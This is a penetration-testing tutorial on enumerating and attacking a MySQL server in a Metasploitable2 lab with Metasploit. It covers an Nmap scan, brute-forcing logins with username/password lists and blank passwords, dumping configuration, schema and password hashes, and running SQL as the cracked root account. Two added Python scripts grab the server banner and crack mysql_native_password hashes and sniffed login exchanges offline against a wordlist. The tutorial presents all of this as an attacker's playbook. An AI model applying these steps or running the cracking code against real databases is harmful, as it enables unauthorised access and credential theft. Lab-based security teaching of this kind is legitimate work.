Reconnaissance is the most important phase of an attack. Without prior knowledge of the victim and of the weaknesses that can be used against it, an attack cannot be mounted successfully.
The target space is not just the internet. It is a collection of independent networks containing telecommunication networks, databases, smart devices and web applications, and each is exploited with different techniques depending on the information gathered during reconnaissance.
Databases are a key target for cyber criminals because of the valuable information they store and because of a long list of common weaknesses: deployment failures, misconfigured databases, data leaks, stolen database backups, lack of segregation, SQL injection and data inconsistencies.
Any information about a database is an advantage to an attacker planning an attack. Knowing the version tells the attacker whether a public exploit exists for an outdated release; knowing the structure points to where the valuable data lives. Weak credentials on a poorly secured database can be reused against a better protected one (password reuse) or brute-forced directly. Finally, knowledge of the schema is what turns a blind SQL injection into a targeted one.
In this article we enumerate this kind of information from a MySQL database using the Metasploit framework, which ships a number of auxiliary modules for exactly this job. The commands are run from Metasploit on Kali Linux against a Metasploitable2 target.
Table of Contents
- Scanning
- Cracking the Credentials
- Use the MySQL Enumerator to Get Information
- Dump Database Schema
- Find Hashes of MySQL Passwords
- Execute SQL Queries
Scanning
The first step of reconnaissance is scanning the target to determine whether MySQL is running on the victim's machine. MySQL listens on TCP port 3306 by default, so scan that port with Nmap against the target's IP:
nmap -p 3306 192.168.0.101
The scan shows port 3306 open with MySQL listening on it.
Now enumerate the database and collect as much information as possible to plan the next step.
Start the Metasploit framework by typing msfconsole at the Kali prompt:
List the MySQL modules that can help. Type search mysql:
A number of modules are listed. For now we are only interested in the auxiliary scanner modules.
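As an added example (not code from the original post or from Metasploit), the script below decodes the first packet a MySQL server sends on connect. This is the packet the mysql_version scanner and Nmap's mysql-info script read to report the server version, whether TLS is offered and which authentication plugin is in use, before any credential is tried. The sample packets are constructed inside the script so that it runs offline: the version string 5.0.51a-3ubuntu5 is the build Metasploitable2 reports, while the 8.0 sample, the connection id, the scramble bytes and the refused-host address are made up for the example. fetch_greeting() shows how the same bytes are obtained from a live host on 3306.

```python
"""Decode the greeting a MySQL server sends on connect (a banner grab).

Added example for this article, not code from the original post or from
Metasploit. The packets below are constructed locally so the script runs
offline; fetch_greeting() reads the real one from a host on port 3306.
"""
from __future__ import annotations

import socket
import struct

# Capability flags from the MySQL client/server protocol used here
CLIENT_PROTOCOL_41 = 0x0200
CLIENT_SSL = 0x0800
CLIENT_SECURE_CONNECTION = 0x8000
CLIENT_PLUGIN_AUTH = 0x00080000


def read_packet(data: bytes) -> tuple[int, bytes]:
    """Split off the 4-byte header: 3-byte little-endian length, 1-byte sequence id."""
    if len(data) < 4:
        raise ValueError("short packet header")
    length = int.from_bytes(data[0:3], "little")
    payload = data[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return data[3], payload


def parse_greeting(data: bytes) -> dict:
    """Decode HandshakeV10, or the ERR packet sent when the server refuses our host."""
    _, p = read_packet(data)
    if p[0] == 0xFF:                                   # ERR packet
        code = struct.unpack_from("<H", p, 1)[0]
        pos, sql_state = 3, None
        if p[pos:pos + 1] == b"#":                     # SQLSTATE only once PROTOCOL_41 is negotiated
            sql_state = p[pos + 1:pos + 6].decode("ascii")
            pos += 6
        return {"error": code, "sql_state": sql_state, "message": p[pos:].decode("latin-1")}
    if p[0] != 0x0A:
        raise ValueError(f"unsupported protocol version {p[0]}")
    end = p.index(b"\x00", 1)
    version = p[1:end].decode("latin-1")
    pos = end + 1
    conn_id = struct.unpack_from("<I", p, pos)[0]
    pos += 4
    scramble = p[pos:pos + 8]                          # auth-plugin-data part 1
    pos += 9                                           # plus one filler byte
    cap_low, charset, status, cap_high = struct.unpack_from("<HBHH", p, pos)
    pos += 7
    caps = cap_low | (cap_high << 16)
    auth_len = p[pos]                                  # 0 on servers without CLIENT_PLUGIN_AUTH
    pos += 1 + 10                                      # length byte plus 10 reserved bytes
    auth_plugin = None
    if caps & CLIENT_SECURE_CONNECTION:
        scramble += p[pos:pos + 12]                    # part 2: 12 more bytes, then a NUL
        pos += max(13, auth_len - 8)
    if caps & CLIENT_PLUGIN_AUTH:
        end = p.find(b"\x00", pos)                     # some 5.5 builds omit the terminator
        auth_plugin = p[pos:end if end != -1 else len(p)].decode("latin-1")
    return {"version": version, "connection_id": conn_id, "scramble": scramble.hex(),
            "capabilities": caps, "ssl": bool(caps & CLIENT_SSL), "charset": charset,
            "status": status,
            "auth_plugin": auth_plugin}                # None: pre-plugin default, mysql_native_password


def fetch_greeting(host: str, port: int = 3306, timeout: float = 5.0) -> dict:
    """Connect and read the first packet; the server speaks first, so nothing is sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        header = s.recv(4)
        length = int.from_bytes(header[0:3], "little")
        payload = b""
        while len(payload) < length:
            chunk = s.recv(length - len(payload))
            if not chunk:
                break
            payload += chunk
    return parse_greeting(header + payload)


def build_handshake(version: str, scramble: bytes, caps: int, plugin: str | None = None) -> bytes:
    """Construct a HandshakeV10 packet for offline testing (not a real server's bytes)."""
    assert len(scramble) == 20
    body = b"\x0a" + version.encode() + b"\x00"
    body += struct.pack("<I", 4242)                    # made-up connection id
    body += scramble[:8] + b"\x00"
    body += struct.pack("<HBHH", caps & 0xFFFF, 8, 0x0002, caps >> 16)
    body += bytes([21 if caps & CLIENT_PLUGIN_AUTH else 0]) + b"\x00" * 10
    body += scramble[8:] + b"\x00"
    if caps & CLIENT_PLUGIN_AUTH:
        body += plugin.encode() + b"\x00"
    return len(body).to_bytes(3, "little") + b"\x00" + body


# Constructed samples; a real server sends fresh random scramble bytes per connection.
_SCRAMBLE = bytes(range(0x41, 0x41 + 20))
OLD_SERVER = build_handshake("5.0.51a-3ubuntu5",      # the build Metasploitable2 reports
                             _SCRAMBLE, CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION)
NEW_SERVER = build_handshake("8.0.36", _SCRAMBLE, CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION
                             | CLIENT_SSL | CLIENT_PLUGIN_AUTH, "caching_sha2_password")
_refused = b"\xff" + struct.pack("<H", 1130) + b"Host '192.168.0.5' is not allowed to connect to this MySQL server"
REFUSED = len(_refused).to_bytes(3, "little") + b"\x00" + _refused

if __name__ == "__main__":
    for name, pkt in ("old", OLD_SERVER), ("new", NEW_SERVER), ("refused", REFUSED):
        print(name, parse_greeting(pkt))
```

Two fields matter most for what follows: a server that does not set CLIENT_SSL cannot be spoken to over TLS, so every login attempt the credential scanner makes crosses the wire in the clear, and a missing auth plugin name means the old mysql_native_password scheme, whose hashes are covered later in this article. An ERR packet with code 1130 means the server is up but refuses your source address; enumeration then has to come from a permitted host.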
Cracking the Credentials
Let's start with the mysql_login module to find valid credentials for the MySQL service. Load it with the use command:
use auxiliary/scanner/mysql/mysql_login
Type show options to see the module's current settings:
Now create a file containing a list of common usernames. A short list is enough for this demonstration; in a real engagement much longer, publicly available lists are used. Name the file as you like:
Add some common usernames and save it:
Create a second file containing common passwords. Again, a longer list is normally used, but since every extra entry adds another attempt per username, we keep it short here. Add the passwords and save the file:
Point the module at the two files, ehacking_user.txt and passwords.txt, with the USER_FILE and PASS_FILE options so that usernames and passwords are read from them:
MySQL accounts can be created with an empty password, so set BLANK_PASSWORDS to true to have the module try a blank password for every username as well:
Set the target IP address in RHOSTS. Use setg rather than set so the value is global, since all the remaining modules will run against the same target:
With everything configured, run the module with run (or exploit):
The module tries every username and password combination from the two files and reports each valid login it finds along the way.
So far only 'root' and 'guest' are valid logins, and both have blank passwords. With real-world list sizes this takes time, but given enough attempts and a weak password policy it will eventually succeed.
Use the MySQL Enumerator to Get Information
The mysql_enum module automatically enumerates useful information about the server: version, host name, data directories and a range of security-relevant settings that are configurable in MySQL. Load the module:
use auxiliary/scanner/mysql/mysql_enum
Once the module is loaded, type show options to see its current settings.
The target IP is already set because we used setg earlier, and the port is at its default, so the only thing left to configure is the username. Set USERNAME to 'root' or 'guest', since we already know both accounts log in with a blank password, and set it globally so the following modules pick it up as well:
Now run the module:
It enumerates the version, server host name, data directory, SSL connection state and many other details that help an attacker choose the next step.
Dump Database Schema
The mysql_schemadump module dumps schema information from the database. The schema is the blueprint of a database: which databases, tables and columns exist and how they are typed. This is the information that later makes a SQL injection attack precise rather than blind. Load the module and type show options to see its configuration:
use auxiliary/scanner/mysql/mysql_schemadump
Every option is already set, so run the module:
As mentioned earlier, it returns a lot of useful schema information, and Metasploit saves the output as loot in a text file for later reference.
Find Hashes of MySQL Passwords
The next module is mysql_hashdump, which gathers the password hashes stored in the mysql.user table. The hashes are useful for pivoting: if they can be cracked, reused passwords may grant access to other systems. Load the module and type show options:
use auxiliary/scanner/mysql/mysql_hashdump
Again, all parameters are already set, so run the module:
On completion the module saves any hashes it finds as loot. Since the accounts on this target have blank passwords, there is no hash to collect here.
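As an added example covering both the credential cracking and the hash dump above (this is not Metasploit code or code from the original post), the script below attacks mysql_native_password offline. The hashes mysql_hashdump collects on MySQL up to 5.7 are '*' followed by the uppercase hex of SHA1(SHA1(password)), so a wordlist can be hashed and compared locally with no network round trips and none of the failed-login noise the mysql_login module generates; accounts with a blank password appear with an empty hash field, which is why the run above had nothing to crack. The same script also checks a captured login exchange (the server's 20-byte scramble plus the client's 20-byte token) against a wordlist, which is what anyone sniffing the path sees while mysql_login runs against a server that offers no TLS. The loot lines and the wordlist are constructed for the example; the 'user:hash' layout follows the module's loot file, and the two real hash values are MySQL's PASSWORD('root') and PASSWORD('password'). caching_sha2_password, the default in MySQL 8.0, uses a different scheme not handled here.

```python
"""Crack mysql_native_password material offline.

Added example for this article; not Metasploit code and not from the
original post. Input is (1) mysql_hashdump loot in "user:hash" form and
(2) a captured scramble/token pair from a login attempt. Sample data is
constructed below.
"""
from __future__ import annotations

import hashlib


def sha1(b: bytes) -> bytes:
    return hashlib.sha1(b).digest()


def mysql_native_hash(password: str) -> str:
    """What mysql.user stores for mysql_native_password: '*' + HEX(SHA1(SHA1(pw)))."""
    return "*" + sha1(sha1(password.encode())).hex().upper()


def scramble_token(password: str, scramble: bytes) -> bytes:
    """Token the client sends: SHA1(pw) XOR SHA1(scramble || SHA1(SHA1(pw))).
    For an empty password the protocol sends a zero-length token instead."""
    stage1 = sha1(password.encode())
    mask = sha1(scramble + sha1(stage1))
    return bytes(a ^ b for a, b in zip(stage1, mask))


def token_matches_hash(token: bytes, scramble: bytes, stored: str) -> bool:
    """The server's own check: recover SHA1(pw) from the token and re-hash it.
    Anyone holding the stored hash plus a sniffed exchange can do the same."""
    stage2 = bytes.fromhex(stored[1:])
    mask = sha1(scramble + stage2)
    stage1 = bytes(a ^ b for a, b in zip(token, mask))
    return sha1(stage1) == stage2


def parse_loot(text: str) -> list[tuple[str, str]]:
    """'user:hash' lines; the hash field is empty for accounts without a password."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, h = line.partition(":")
        entries.append((user, h))
    return entries


def crack_loot(text: str, wordlist: list[str]) -> dict[str, str | None]:
    """Map each account to its password: '' for blank-password accounts,
    None when the hash is not in the wordlist or not a native-password hash."""
    table = {mysql_native_hash(w): w for w in wordlist}
    result: dict[str, str | None] = {}
    for user, h in parse_loot(text):
        if h == "":
            result[user] = ""
        elif h.startswith("*") and len(h) == 41:
            result[user] = table.get(h.upper())
        else:
            result[user] = None          # 16-hex pre-4.1 hash or another plugin
    return result


def crack_token(scramble: bytes, token: bytes, wordlist: list[str]) -> str | None:
    """Dictionary attack on a sniffed login exchange."""
    if len(token) == 0:
        return ""                        # empty token means an empty password was sent
    for w in wordlist:
        if w and scramble_token(w, scramble) == token:
            return w
    return None


# Constructed sample in the user:hash layout mysql_hashdump writes to loot.
# The svc hash is a placeholder that matches no wordlist entry.
SAMPLE_LOOT = """\
root:
guest:
appuser:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
backup:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
svc:*0123456789ABCDEF0123456789ABCDEF01234567
"""
WORDLIST = ["root", "password", "toor", "admin", "mysql", "123456"]

if __name__ == "__main__":
    print(crack_loot(SAMPLE_LOOT, WORDLIST))
    scr = bytes(range(20))               # a real server picks 20 random bytes per connection
    tok = scramble_token("password", scr)
    print(crack_token(scr, tok, WORDLIST))
```

Note the asymmetry this exposes: the unsalted double SHA1 lets one precomputed table serve every account on every server, so a hash recovered here is immediately testable against other hosts, which is the password-reuse pivot the module description refers to.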
Execute SQL Queries
The last module is mysql_sql, which runs arbitrary SQL queries from within the Metasploit framework. Load the module and look at the current options:
use auxiliary/admin/mysql/mysql_sql
Every parameter is already set except the query itself. The most familiar statement when connecting to a new server is show databases, which lists every database the account can see:
Set the SQL option:
set SQL show databases
Run the module:
And there you go: a list of the databases available in this MySQL instance.
We have used a number of Metasploit auxiliary modules to extract valuable information from a MySQL server. Together they crack credentials, enumerate the server configuration, dump the schema and collect password hashes, all information that can be used to exploit the target further, including through SQL injection.